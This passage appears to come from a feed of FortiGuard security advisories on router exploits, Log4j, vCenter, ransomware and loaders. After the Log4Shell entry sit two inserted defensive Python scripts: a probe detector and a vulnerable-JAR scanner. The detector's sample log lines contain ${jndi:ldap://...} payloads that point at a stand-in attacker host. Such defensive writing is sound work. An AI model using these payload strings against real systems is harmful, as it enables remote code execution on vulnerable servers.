CVE-2019-19824: Realtek SDK based routers
CVE-2020-10173: VR-3033 router
CVE-2020-10987: Tenda products
CVE-2020-8515: Vigor routers
CVE-2020-8958: Guangzhou 1 GE ONU
CVE-2020-9054: Zyxel routers and NAS devices
CVE-2020-9377: D-Link routers
What is the Status of Coverage?
FortiGuard Labs provides the following AV coverage against available BotenaGo malware samples: Linux/Botenago.A!tr, PossibleThreat
FortiGuard Labs provides the following IPS coverage against exploit attempts made by BotenaGo:
ZTE.Router.Web_shell_cmd.Remote.Command.Execution (CVE-2014-2321)
D-Link.Devices.HNAP.SOAPAction-Header.Command.Execution (CVE-2015-2051)
Netgear.macAddress.Remote.Command.Execution (CVE-2016-1555)
NETGEAR.WebServer.Module.Command.Injection (CVE-2016-6277)
TrueOnline.ZyXEL.P660HN.V1.Unauthenticated.Command.Injection (CVE-2017-18368)
NETGEAR.ping_IPAddr.HTTP.Post.Command.Injection (CVE-2017-6077)
NETGEAR.DGN.DnsLookUp.Remote.Command.Injection (CVE-2017-6334)
XiongMai.uc-httpd.Buffer.Overflow (CVE-2018-10088)
Dasan.GPON.Remote.Code.Execution (CVE-2018-10561, Dasan.GPON.Remote.Code.Execution)
Comtrend.VR-3033.Remote.Command.Injection (CVE-2020-10173)
Tenda.AC15.AC1900.Authenticated.Remote.Command.Injection (CVE-2020-10987)
DrayTek.Vigor.Router.Web.Management.Page.Command.Injection (CVE-2020-8515)
ZyXEL.NAS.Pre-authentication.OS.Command.Injection (CVE-2020-9054)
All network IOCs are blocked by the WebFiltering client.
FortiGuard Labs is currently investigating for additional coverage. This Threat Signal will be updated when new protection becomes available.
Malware Threat
Fortinet.webp 2022-01-26 21:58:14 Critical VMware vCenter Server vulnerability (CVE-2021-22005) being exploited in the wild (direct link)
FortiGuard Labs is aware that VMware disclosed a critical vulnerability (CVE-2021-22005) on September 21st, 2021 that affects vCenter Server versions 6.7 and 7.0. A malicious attacker with network access to port 443 on vCenter Server can exploit the vulnerability and execute code on vCenter Server upon successful exploitation. The VMware advisory was updated on September 24th to state that the vulnerability is being exploited in the wild. In addition, exploit code is publicly available.
Why is this Significant?
VMware has one of the highest market shares in the server virtualization market, so the vulnerability can have a widespread effect. Also, some public reports indicate that CVE-2021-22005 is being exploited in the wild. With exploit code being publicly available, more attackers are expected to leverage the security bug. Because of the potential impact the vulnerability has in the field, CISA released an advisory on September 24th, 2021.
What are the Details of the Vulnerability?
Details of the vulnerability have not been disclosed by VMware.
Has VMware Released an Advisory for CVE-2021-22005?
Yes, the vendor released a cumulative advisory on September 21st, 2021. See the Appendix for a link to VMSA-2021-0020.1. The vendor also released a supplemental blog post and an advisory. See the Appendix for links to "VMSA-2021-0020: What You Need to Know" and "VMSA-2021-0020: Questions & Answers".
Has the Vendor Released a Patch?
Yes. VMware released a patch on September 21st, 2021.
Any Mitigation and or Workarounds?
VMware provided workarounds in a blog. See the Appendix for a link to "Workaround Instructions for CVE-2021-22005 (85717)".
What is The Status of Coverage?
FortiGuard Labs is investigating for IPS protection. This Threat Signal will be updated with protection information as it becomes available.
Vulnerability Threat
Fortinet.webp 2022-01-12 18:27:37 Wormable Windows Vulnerability (CVE-2022-21907) Patched by Microsoft (direct link)
FortiGuard Labs is aware that a total of 96 vulnerabilities were patched by Microsoft on January 11th, 2022 as part of the regular MS Patch Tuesday. Among those vulnerabilities, CVE-2022-21907 (HTTP Protocol Stack Remote Code Execution Vulnerability) is one of the nine rated critical. In the advisory, Microsoft warned that CVE-2022-21907 is wormable and "recommends prioritizing the patching of affected servers".
Why is this Significant?
This is significant because CVE-2022-21907 is considered wormable: malware can exploit the vulnerability to self-propagate without any user interaction or elevated privilege. CVE-2022-21907 targets the HTTP trailer support feature that is enabled by default in various Windows 10 and 11 versions, as well as Windows Server 2022. The vulnerability also has a CVSS score of 9.8 (max score 10).
What is CVE-2022-21907?
CVE-2022-21907 is a remote code execution vulnerability in the HTTP protocol stack (http.sys). HTTP.sys is a legitimate Windows component that is responsible for parsing HTTP requests. An unauthenticated attacker could craft and send a malicious packet to an affected server that utilizes the HTTP Protocol Stack (http.sys) to process packets, which leads to remote code execution.
Which Versions of Windows are Vulnerable?
Per the Microsoft advisory, the following Windows versions are vulnerable: Windows Server 2019, Windows Server 2022, Windows 10, Windows 11
Note that the HTTP trailer support feature is inactive by default in Windows Server 2019 and Windows 10 version 1809. As such, they are not vulnerable unless the feature is enabled.
Is the Vulnerability Exploited in the Wild?
FortiGuard Labs is not aware of CVE-2022-21907 being exploited in the wild at the time of this writing.
Has the Vendor Released a Fix?
Yes. Microsoft released a fix for CVE-2022-21907 on January 11th, 2022 as part of the regular Patch Tuesday.
What is the Status of Coverage?
FortiGuard Labs is currently investigating protection and will update this Threat Signal once coverage information becomes available.
Any Mitigation?
Microsoft provided the following mitigation in the advisory: In Windows Server 2019 and Windows 10 version 1809, the HTTP Trailer Support feature that contains the vulnerability is not active by default. The following registry key must be configured to introduce the vulnerable condition: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HTTP\Parameters\"EnableTrailerSupport"=dword:00000001
This mitigation does not apply to the other affected versions.
Malware Vulnerability Threat Patching Guideline
Fortinet.webp 2022-01-07 18:18:27 Remote Code Execution in H2 Console JNDI - (CVE-2021-42392) (direct link)
FortiGuard Labs is aware of a newly discovered vulnerability in the H2 Database software. The vulnerability is an unauthenticated remote code execution in the H2 database console; like Log4j, it is JNDI-based and has a similar exploit vector. This vulnerability has been assigned CVE-2021-42392 and was found by security researchers at JFrog.
What is H2 Database?
H2 is an open source relational database management system written in Java. It can be embedded in Java applications or run in client-server mode, and data does not need to be stored on disk.
What are the Technical Details?
In a nutshell, the vector is similar to Log4Shell: several code paths in the H2 database framework pass unfiltered attacker-controlled URLs to the javax.naming.Context.lookup function, which allows for remote codebase loading (remote code execution). The H2 database contains a web based console which listens for connections at http://localhost:8082. The console accepts parameters that are passed to JdbcUtils.getConnection, including a malicious URL controlled by the attacker.
This vulnerability affects systems with the H2 console installed. The vulnerability does not affect machines with the H2 database installed in standalone mode. The console (by default) accepts connections only from localhost, i.e. non-remote connections. However, this configuration can be modified to listen for remote connections, making the system susceptible to remote code execution attacks.
How Severe is This? Is it Similar to Log4j?
According to the report, this is not believed to be as severe as Log4j, because of several factors. The first factor is that the H2 console must be present on the system, as the console and the database are able to operate independently of each other.
Second, the default configuration of accepting connections from localhost must be edited to listen for external connections, which means that default installations are safe to begin with.
What is the CVSS score?
At this time, details are not available.
What Mitigation Steps are Available?
FortiGuard Labs recommends that users of the H2 database software upgrade to version 2.0.206 immediately. If this is not possible, placing a vulnerable instance behind a firewall or removing access from the public facing internet is suggested. For further details on mitigation, please refer to the JFrog blog "The JNDI Strikes Back - Unauthenticated RCE in H2 Database Console" located in the APPENDIX.
What is the Status of Coverage?
FortiGuard Labs is currently assessing an IPS signature to address CVE-2021-42392. This Threat Signal will be updated once a relevant update is available.
Vulnerability Threat
Fortinet.webp 2021-12-28 19:12:16 Log4j 2.17.1 Released for CVE-2021-44832 (direct link)
FortiGuard Labs is aware of a newly disclosed remote code execution vulnerability affecting Log4j. Assigned CVE-2021-44832, this vulnerability allows for a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI, which can execute remote code.
There has been confusion on Twitter as to whether this is actually a remote code execution (RCE) or an arbitrary code execution (ACE) vulnerability. Researcher Yaniv Nizry (@YNizry) initially stated today that a new RCE vulnerability related to Log4j was to be announced, and later retracted that initial statement, confirming that it is indeed arbitrary code execution and not remote code execution. Compounding matters, Apache classifies CVE-2021-44832 as a remote code execution vulnerability. In the writeup for CVE-2021-44832, Apache states that the attacker needs permission to "modify the logging configuration file" to successfully exploit this vulnerability, which is not indicative of an RCE. CVE-2021-44832 is fixed in Log4j 2.17.1 (Java 8), 2.12.4 (Java 7) and 2.3.2 (Java 6).
What is Arbitrary Code Execution and Remote Code Execution?
Arbitrary code execution (ACE) results from a flaw in software or hardware that allows an attacker to target a specific machine or process to run code of their choice. Remote code execution (RCE) allows an attacker to arbitrarily execute code remotely over a wide area network, such as the Internet.
What Versions of Log4J are Affected?
All versions from 2.0-alpha7 to 2.17.0, excluding 2.3.2 and 2.12.4.
What is the CVSS Score?
6.6 (MODERATE)
What is the Status of Coverage?
Analysis on this new vulnerability is underway to determine coverage feasibility. We will update this Threat Signal when updates are available.
What Mitigation is Suggested?
According to Apache, the following mitigation is available:
Log4j 1.x mitigation: Log4j 1.x is not impacted by this vulnerability.
Log4j 2.x mitigation: Upgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later). In prior releases, confirm that if the JDBC Appender is being used it is not configured to use any protocol other than Java.
Note that only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability. Also note that Apache Log4j is the only Logging Services subproject affected by this vulnerability. Other projects like Log4net and Log4cxx are not impacted by this.
Vulnerability Threat
Fortinet.webp 2021-12-27 17:29:05 Meet Rook Ransomware (direct link)
FortiGuard Labs is aware of a recently reported ransomware, "Rook". According to a publicly available report, Rook appears to be based on the leaked Babuk ransomware source code. One of Rook's victims is a financial institution in Kazakhstan, from which the ransomware gang stole more than 1,000 GB worth of data.
Why is this Significant?
This is significant because Rook is one of the recent ransomware gangs that joined the already crowded ransomware landscape. The ransomware reportedly infected a financial institution in Kazakhstan and stole more than 1,000 GB worth of data.
What is Rook Ransomware?
Rook ransomware is reported to be based on the leaked Babuk source code and was first discovered in the wild at the end of November 2021. Files encrypted by Rook ransomware typically have the ".rook" file extension; however, the earlier version of Rook is said to use the ".tower" file extension instead. The ransomware leaves a ransom note in HowToRestoreYourFiles.txt, which instructs the victim to contact the Rook gang either by accessing Rook's Tor web site or by emailing the threat actor. The ransom note warns the victim that the private key to decrypt the encrypted files will be destroyed if a security vendor or law enforcement agency joins the negotiation.
How is Rook Ransomware Delivered?
Rook ransomware is reported to have been delivered via Cobalt Strike or untrustworthy Torrent downloads.
What is the Status of Coverage?
FortiGuard Labs provides the following AV coverage against Rook ransomware: W32/Filecoder_Sodinokibi.A!tr.ransom
Ransomware Threat
Fortinet.webp 2021-12-27 17:28:38 Mortar Loader: New tool for Process Hollowing written in Pascal (direct link)
Mortar Loader is a new process hollowing tool that can be leveraged by threat actors. Process hollowing is a well-known evasion technique used by adversaries to defeat detection and prevention by security products. Mortar Loader is implemented as an open-source tool for red teamers in the Pascal programming language. A loader is malicious code or a program used for loading the actual payload on the infected machine.
What is Process Hollowing?
Process hollowing is a method of executing arbitrary code in the address space of a separate live process. It is commonly performed by creating a process in a suspended state and then unmapping its memory, which can then be replaced with malicious code. Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses.
How does Mortar Loader work?
Mortar has two components, the payload encryptor and the loader itself. The encryptor runs on the attacker's machine to prepare the selected PE payload. It encrypts the payload with the Blowfish symmetric encryption algorithm and encodes the ciphertext with base64. The loader uses memory stream objects to reverse these operations, decoding and decrypting the payload using a hardcoded key. It can be compiled as a standalone executable or a DLL. The plaintext payload is executed using the vanilla process hollowing technique without writing it to a file on disk.
What is the Status of Coverage?
FortiEDR detects and blocks payloads executed by Mortar Loader out-of-the-box, as it detects process hollowing from the operating system's perspective. Depending on the enabled set of policies, FortiEDR can block creation of such malicious processes (pre-execution) or malicious operations performed by the payload (post-infection).
Tool Threat
Fortinet.webp 2021-12-20 19:11:01 Mirai Malware that Allegedly Propagates Using Log4Shell Spotted in the Wild (direct link)
FortiGuard Labs is aware of a new Mirai Linux variant that spreads using CVE-2021-44228 (Log4Shell). This is possibly the first Mirai variant equipped with Log4Shell exploit code since the vulnerability came to light on December 9th 2021. This sample was discovered by security researcher @1ZRR4H on Twitter.
How does this Mirai Variant Work? Is this a Worm?
The Mirai variant exploits CVE-2021-44228 and CVE-2017-17215 (Huawei HG532 Remote Code Execution). If the exploit is successful, the targeted machine is redirected to an LDAP server that passes the next stage payload (which varies) to the victim machine.
Furthermore, chatter on OSINT channels has discussed whether or not this is a "worm." Our findings reveal that, like a worm, it has the capability to propagate. What makes it not a worm in the traditional sense is that all instructions are under the control of the botmaster and it relies on an external resource for propagation. The botmaster can also start/stop various actions, unlike a worm. In conclusion, our analysis concludes that this Mirai variant is equipped with Log4Shell exploit code and Huawei HG532 exploit code and does not classify as a worm.
What is Mirai malware?
Mirai malware is a Linux IoT malware that makes infected machines join a zombie network that is used for Distributed Denial of Service (DDoS) attacks. The first report of Mirai goes back to at least August 2016. Since the source code of Mirai was leaked publicly, there have been numerous threat actors and campaigns incorporating Mirai and related variants in the wild. FortiGuard Labs previously published several blogs on Mirai IoT malware. Please refer to the APPENDIX for links to related blogs.
Why is this Significant?
This sample was reported to be one of the first worm-like samples exploiting Log4Shell. However, our analysis has concluded that this specific sample does not qualify as, nor can it be classified as, a worm.
What is the Status of Coverage?
FortiGuard Labs provides the following AV coverage against this Mirai malware variant: ELF/Mirai.VI!tr
FortiGuard Labs provides the following IPS coverage against CVE-2017-17215: Huawei.HG532.Remote.Code.Execution
For FortiEDR, all known samples have been added to our cloud intelligence and will be blocked if executed.
All network IOCs are blocked by the WebFiltering client.
Malware Vulnerability Threat
Fortinet.webp 2021-12-20 06:10:10 New Log4j Vulnerability (CVE-2021-45046) Results in Denial of Service (direct link)
UPDATE December 17 2021: The Apache Software Foundation has changed the classification from Denial of Service to Remote Code Execution and has upgraded the CVSS score from 3.7 to 9.0; as such, this Threat Signal has been updated accordingly along with protection information.
What is the Vulnerability? (Updated on December 17th)
This is a new vulnerability (CVE-2021-45046) discovered in Log4j, the same utility that last week announced a critical vulnerability known as Log4Shell (CVE-2021-44228). Successfully exploiting this new vulnerability would result in an information leak and remote code execution (RCE) in some environments and local code execution in all environments. Initially CVE-2021-45046 was identified as a Denial of Service vulnerability. The new vulnerability is tracked as CVE-2021-45046. The vulnerability was initially given a CVSS score of 3.7; however, the score was upgraded to 9.0 as remote code execution and information leak could be achieved as a result of successful exploitation. Apache provides the following updated description in their advisory on December 16th: It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments; remote code execution has been demonstrated on macOS but no other tested environments. FortiGuard Labs previously released a Threat Signal for CVE-2021-44228 (Log4Shell). See the Appendix for a link to "Apache Log4J Remote Code Execution Vulnerability (CVE-2021-44228)".
What Versions of Log4j are Affected?
All versions from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0
Has Apache Released a Fix for CVE-2021-45046?
Yes. In response to the issue, Apache Log4j 2.16.0 was released for Java 8 and up and 2.12.2 for Java 7.
What is the Status of Coverage? (Updated on December 17th)
FortiGuard Labs provides the following AV coverage against CVE-2021-45046: Apache.Log4j.Error.Log.Remote.Code.Execution
Any Suggested Mitigation?
Apache provides the following mitigation in their advisory:
Log4j 1.x mitigation: Log4j 1.x is not impacted by this vulnerability.
Log4j 2.x mitigation: Implement one of the mitigation techniques below. Java 8 (or later) users should upgrade to release 2.16.0. Users requiring Java 7 should upgrade to release 2.12.2 when it becomes available (work in progress, expected to be available soon). Otherwise, remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
Note that only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability.
Vulnerability Threat
Fortinet.webp 2021-12-13 09:00:42 Apache Log4J Remote Code Execution Vulnerability (CVE-2021-44228) (direct link) FortiGuard Labs is aware of a remote code execution vulnerability in Apache Log4j. Log4j is a Java-based logging framework maintained by the Apache Software Foundation. Apache Log4j2 2.14.1 and below are susceptible to a remote code execution vulnerability that a remote attacker can leverage to take full control of a vulnerable machine. This vulnerability is also known as Log4Shell and has been assigned CVE-2021-44228. FortiGuard Labs will be monitoring this issue for any further developments.

What are the Technical Details?
In Apache Log4j2 versions 2.14.1 and below, the Java Naming and Directory Interface (JNDI) features do not protect against attacker-controlled LDAP and other JNDI-related endpoints. When message lookup substitution is enabled, an attacker who controls log messages or log message parameters can embed a ${jndi:...} lookup pointing at an LDAP server they control; the vulnerable application resolves the lookup and executes arbitrary code loaded from that server.

What Versions of Software are Affected?
Apache Log4j versions 2.0-beta9 to 2.14.1 are affected.

Is there a Patch or Security Update Available?
Yes, moving to version 2.15.0 mitigates this issue. Further mitigation steps are available from Apache as well. Please refer to "Apache Log4j Security Vulnerabilities" in the APPENDIX for details.

What is the CVSS Score?
10 (CRITICAL)

What Exactly is Apache Log4j?
According to Apache: Log4j is a tool to help the programmer output log statements to a variety of output targets. In case of problems with an application, it is helpful to enable logging so that the problem can be located. With log4j it is possible to enable logging at runtime without modifying the application binary. The log4j package is designed so that log statements can remain in shipped code without incurring a high performance cost. It follows that the speed of logging (or rather not logging) is capital. At the same time, log output can be so voluminous that it quickly becomes overwhelming. One of the distinctive features of log4j is the notion of hierarchical loggers. Using loggers it is possible to selectively control which log statements are output at arbitrary granularity.

What is the Status of Protections?
FortiGuard Labs has IPS coverage in place for this issue (IPS definitions version 19.215) as:
Apache.Log4j.Error.Log.Remote.Code.Execution
While we urge customers to patch vulnerable systems as soon as possible, FortiEDR monitors and protects against payloads delivered by exploitation of the vulnerability. The picture below demonstrates blocking of a PowerShell payload used as part of CVE-2021-44228 exploitation:
Detection of exploitable systems is possible via FortiEDR threat hunting by searching for loading of vulnerable log4j versions. This is an example of a vulnerable log4j library being loaded by an Apache Tomcat server:

Any Suggested Mitigation?
According to Apache, the following mitigation steps are available:
In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to "true".
For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
FortiGuard Labs recommends that organizations affected by CVE-2021-44228 update to the latest version, 2.15.0, immediately. Apache also recommends that users still running Log4j 1.x install version 2.0 or higher, since Log4j 1.x reached end of life in August 2015 and no longer receives security updates. Apache does not provide binary patches; source patches must be compiled. For further details, refer to "Apache Log4j Security Vulnerabilities" in the APPENDIX. If updating is not possible, countermeasures such as isolating public-facing machines behind a firewall or VPN are recommended. Tool Vulnerability Threat ★★★★★
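How the lookup substitution described above is abused, and how to spot it in logs, as an added example that is not FortiGuard or Apache code: the script below collapses the nested-lookup forms attackers used to disguise the ${jndi: prefix and then matches the normalized string over constructed access-log lines. The normalize() function is a deliberately small, assumed model of Log4j 2.x lookup evaluation (only lower:, upper: and the :-default form), not Log4j's own code; the addresses and lines in SAMPLE_LOG are constructed for the demo.

```python
"""Log4Shell probe detection over web-server log lines (added example).
normalize() is an assumed, minimal model of Log4j 2.x nested-lookup
evaluation: ${lower:x}, ${upper:x} and ${key:-default} are the forms
attackers used to hide "${jndi:" from naive string matching."""
import re
from urllib.parse import unquote

# A ${...} whose body contains no further lookup, i.e. the innermost one.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# After normalization every disguised variant collapses to this shape.
_JNDI = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)


def _resolve_one(body):
    """Evaluate one innermost lookup body the way the attacker relies on Log4j doing."""
    lowered = body.lower()
    if lowered.startswith("jndi:"):
        return "${" + body + "}"            # keep the real payload intact for matching
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:                        # unknown key with a default: ${::-j} -> "j"
        return body.split(":-", 1)[1]
    return "${" + body + "}"                # env:, sys:, ... are left as they are


def normalize(text, max_rounds=32):
    """Repeatedly resolve innermost lookups until the string stops changing."""
    for _ in range(max_rounds):
        resolved = _INNERMOST.sub(lambda m: _resolve_one(m.group(1)), text)
        if resolved == text:
            return text
        text = resolved
    return text


def find_jndi(line):
    """Return the normalized ${jndi:...} lookup found in a log line, or None.
    URL-decoding first catches payloads sent percent-encoded in the request line."""
    match = _JNDI.search(normalize(unquote(line)))
    return match.group(0) if match else None


def scan_lines(lines):
    """(line_number, normalized_lookup) for every line that carries a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        found = find_jndi(line)
        if found:
            hits.append((number, found))
    return hits


# Constructed access-log lines for the demo; 203.0.113.7 is a documentation address.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /login HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.7/b}"',
    '10.0.0.9 - - "GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7Ddi%3Aldap%3A%2F%2F203.0.113.7%2Fc%7D HTTP/1.1" 404 "-"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${env:HOME} plain lookup, no JNDI"',
]

if __name__ == "__main__":
    for number, lookup in scan_lines(SAMPLE_LOG):
        print(f"line {number}: {lookup}")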
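The vulnerable-version hunt and the JndiLookup class removal above, as an added example that is not FortiGuard or Apache code: the script below walks a directory of Java artifacts, reads the Maven version from each log4j-core JAR (including JARs nested one level inside .war/.ear files), decides whether it falls in the affected 2.0-beta9 to 2.14.1 range, checks whether JndiLookup.class is still present, and reproduces the zip -q -d mitigation with Python's zipfile so the before/after verdicts can be compared in one run. The pom.properties path is the one Maven writes into log4j-core; the sample jars built by sample_jar_bytes() are constructed fixtures containing only the entries the scanner reads.

```python
"""Log4Shell exposure check for a directory of Java artifacts (added example)."""
import io
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(text):
    """'2.14.1' -> (2, 14, 1, 1, 0); '2.0-beta9' -> (2, 0, 0, 0, 9).
    The fourth field makes betas/rcs sort before the matching final release."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(?:beta|rc)(\d+))?$", text.strip())
    if not m:
        return None
    major, minor, patch, pre = m.group(1, 2, 3, 4)
    return (int(major), int(minor), int(patch or 0), 0 if pre else 1, int(pre or 0))


AFFECTED_LOW = parse_version("2.0-beta9")
AFFECTED_HIGH = parse_version("2.14.1")


def inspect_jar(data):
    """Return (version or None, jndi_present) for the jar bytes, or None when the
    jar carries neither log4j-core Maven metadata nor JndiLookup.class."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        jndi = JNDI_CLASS in names
        if POM_PROPS not in names:
            return (None, True) if jndi else None
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
        m = re.search(r"^version=(.+)$", props, re.MULTILINE)
        return (m.group(1).strip() if m else None), jndi


def classify(version, jndi_present):
    parsed = parse_version(version) if version else None
    if parsed is None:
        # shaded/fat jars often lose pom.properties; the class alone is the signal
        return "unknown version, JndiLookup present" if jndi_present else "unknown version"
    if not (AFFECTED_LOW <= parsed <= AFFECTED_HIGH):
        return "not affected"
    return "VULNERABLE" if jndi_present else "mitigated"


def scan_tree(root):
    """Map each log4j-core artifact under root (jars, and jars inside war/ear) to a verdict."""
    verdicts = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name.endswith(".jar"):
                with open(path, "rb") as fh:
                    found = inspect_jar(fh.read())
                if found:
                    verdicts[rel] = classify(*found)
            elif name.endswith((".war", ".ear")):
                with zipfile.ZipFile(path) as outer:
                    for inner in outer.namelist():
                        if inner.endswith(".jar"):
                            found = inspect_jar(outer.read(inner))
                            if found:
                                verdicts[f"{rel}!{inner}"] = classify(*found)
    return verdicts


def remove_jndi_lookup(path):
    """Rewrite the jar without JndiLookup.class: what  zip -q -d  does in place."""
    tmp = path + ".tmp"
    with zipfile.ZipFile(path) as src, zipfile.ZipFile(tmp, "w") as dst:
        for item in src.infolist():
            if item.filename != JNDI_CLASS:
                dst.writestr(item, src.read(item.filename))
    os.replace(tmp, path)


def sample_jar_bytes(version, with_jndi=True):
    """Constructed fixture: a minimal jar holding only the entries the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not a real class
    return buf.getvalue()


def demo():
    """Scan a constructed tree, apply the class-removal mitigation to one jar, rescan."""
    with tempfile.TemporaryDirectory() as root:
        for version in ("2.14.1", "2.0-beta9", "2.0-beta8", "2.15.0"):
            with open(os.path.join(root, f"log4j-core-{version}.jar"), "wb") as fh:
                fh.write(sample_jar_bytes(version))
        with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
            war.writestr("WEB-INF/lib/log4j-core-2.13.0.jar", sample_jar_bytes("2.13.0"))
        before = scan_tree(root)
        remove_jndi_lookup(os.path.join(root, "log4j-core-2.14.1.jar"))
        after = scan_tree(root)
    return before, after


if __name__ == "__main__":
    before, after = demo()
    for artifact in sorted(before):
        print(f"{artifact:45} {before[artifact]:13} -> {after[artifact]}")
```

Run scan_tree() against the deployment directories of each Java service; anything reported as VULNERABLE, or as "unknown version, JndiLookup present" (typical for shaded jars that dropped their Maven metadata), needs the 2.15.0 update, or the class removal on releases older than 2.10 where the formatMsgNoLookups property is not available.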
Fortinet.webp 2021-12-06 22:36:49 Joint CyberSecurity Advisory on Attacks Exploiting Zoho ManageEngine ServiceDesk Plus Vulnerability (CVE-2021-44077) (direct link) FortiGuard Labs is aware of a recent joint advisory released by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) on APT actors actively exploiting a critical vulnerability in Zoho ManageEngine ServiceDesk Plus. Successfully exploiting the vulnerability (CVE-2021-44077) enables an attacker to compromise administrator credentials, propagate through the compromised network, and conduct cyber espionage.

Why is this Significant?
This is significant because the advisory was released in response to observed active exploitation of the vulnerability. Zoho, the vendor of ManageEngine ServiceDesk Plus, states in its advisory that "we are noticing exploits of this vulnerability, and we strongly urge all customers using ServiceDesk Plus (all editions) with versions 11305 and below to update to the latest version immediately".

What Product and Versions are Vulnerable?
The vulnerable product is ServiceDesk Plus, all editions. Vulnerable versions are all versions up to, and including, version 11305.

What are the Technical Details of the Vulnerability?
Not much information is currently available on the vulnerability, other than that it is related to /RestAPI URLs in a servlet and to ImportTechnicians in the Struts configuration.

What CVE Number and Severity are Assigned to the Vulnerability?
The vulnerability is assigned CVE-2021-44077 and is rated critical with a CVSS score of 9.8.

Which Industries are Targeted?
According to the advisory, Critical Infrastructure Sector industries, including healthcare, financial services, electronics and IT consulting, are targeted by the threat actors.

What Malicious Activities Conducted by the Threat Actors were Observed?
CISA provided the following tactics, techniques and procedures (TTPs) for the observed activities:
- Writing webshells to disk for initial persistence
- Obfuscating and deobfuscating/decoding files or information
- Conducting further operations to dump user credentials
- Living off the land by only using signed Windows binaries for follow-on actions
- Adding/deleting user accounts as needed
- Stealing copies of the Active Directory database (NTDS.dit) or registry hives
- Using Windows Management Instrumentation (WMI) for remote execution
- Deleting files to remove indicators from the host
- Discovering domain accounts with the net Windows command
- Using Windows utilities to collect and archive files for exfiltration
- Using custom symmetric encryption for command and control (C2)

Has the Vendor Patched the Vulnerability?
Yes, Zoho released a patch on September 16, 2021.

Has the Vendor Released an Advisory?
Yes, the vendor released an advisory on September 16, 2021. An additional advisory was released on November 22, 2021. Links are in the Appendix.

What is the Status of Coverage?
FortiGuard Labs provides the following AV coverage against available files that were used in the attack:
Java/Webshell.AD!tr
W64/Agent.BG!tr.pws
W32/Agent.CY!tr
Trojan.Win32.Agentb.kpbc
HEUR:Trojan-Dropper.Win32.Agentb.gen
HEUR:Backdoor.Multi.MalGO.a
Backdoor.Java.JSP.au
Trojan.Win64.Agentb.azo
Trojan.Win32.Agentb.kpbd
Trojan.Win64.Agentb.azp
As for CVE-2021-44077, there is not yet sufficient information available for FortiGuard Labs to develop IPS protection. FortiGuard Labs will investigate protection once such information becomes available and will update this Threat Signal. Vulnerability Threat ★★★★★
Fortinet.webp 2021-12-02 14:48:08 Yanluowang Ransomware Used By a Threat Actor Previously Linked to Thieflock Ransomware (direct link) FortiGuard Labs is aware of a report that Yanluowang ransomware was recently used by a threat actor who previously employed Thieflock ransomware. According to Symantec, the threat actor focuses on organizations across multiple sectors in the United States. Yanluowang ransomware was first reported in October 2021. The Yanluowang attackers demand a ransom from the victims and tell them not to contact law enforcement or ransomware negotiation firms. If they do, the attackers threaten the victim with distributed denial of service (DDoS) attacks as well as phone calls to alert the victim's business partners.

Why is this Significant?
This is significant because the attacker, who mainly targets U.S. corporations, appears to have switched their arsenal from Thieflock ransomware to Yanluowang ransomware. Because of this, companies in the United States need to pay extra attention to the tactics, techniques, and procedures (TTPs) that this attacker uses.

What TTPs is the Attacker Known to Use?
According to the report, the attacker uses the following tools:
- GrabFF: A tool to dump passwords from Firefox
- GrabChrome: A tool to dump passwords from Chrome
- BrowserPassView: A tool to dump passwords from web browsers such as Internet Explorer, Chrome, Safari, Firefox, and Opera
- KeeThief: A PowerShell script to copy the master key from KeePass
- Customized versions of Secretsdump: Security Account Manager (SAM) credential-dumping tools
- FileGrab: A tool to capture newly created files in Windows file systems
